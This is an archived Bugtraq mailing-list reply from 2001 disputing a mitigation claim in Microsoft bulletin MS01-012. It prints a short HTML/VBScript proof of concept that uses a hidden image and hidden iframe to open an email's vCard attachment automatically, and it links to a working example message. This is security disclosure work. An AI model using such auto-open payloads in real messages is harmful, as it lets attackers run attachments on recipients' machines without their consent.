Bugtraq mailing list archives
Re: Microsoft Security Bulletin MS01-012
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Sun, 25 Feb 2001 12:14:10 -0800
Dear Sir,
Mitigating Factors: ==================== - There is no means by which a Vcard could be made to open automatically.
This is not entirely accurate. If you are in the habit of collecting these
odd things, you will have most certainly uncheck-marked the security warning
a long time ago. In that case it is less than trivial to open the Vcard
automatically:
<img id="Bill_Gates" SRC="cid:malware.com" style="VISIBILITY: hidden">
<IFRAME id=Compelling style="VISIBILITY: hidden">
</IFRAME>
<SCRIPT language=vbs>
document.all.item("Compelling").document.location=Bill_Gates.src
</SCRIPT>
Working example:
http://www.malware.com/crap.eml
Yours Sincerely,
Your friend and mine,
http://www.malware.com
--
_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/
Current thread:
- Microsoft Security Bulletin MS01-012 Microsoft Product Security (Feb 23)
- <Possible follow-ups>
- Re: Microsoft Security Bulletin MS01-012 joelmoses (Feb 26)
- Re: Microsoft Security Bulletin MS01-012 http-equiv () excite com (Feb 26)
- Re: Microsoft Security Bulletin MS01-012 Philip Stoev (Feb 27)
- Re: Microsoft Security Bulletin MS01-012 Chris Timmons (Feb 28)
- Re: Microsoft Security Bulletin MS01-012 Philip Stoev (Feb 27)
- Re: Microsoft Security Bulletin MS01-012 foobar (Feb 28)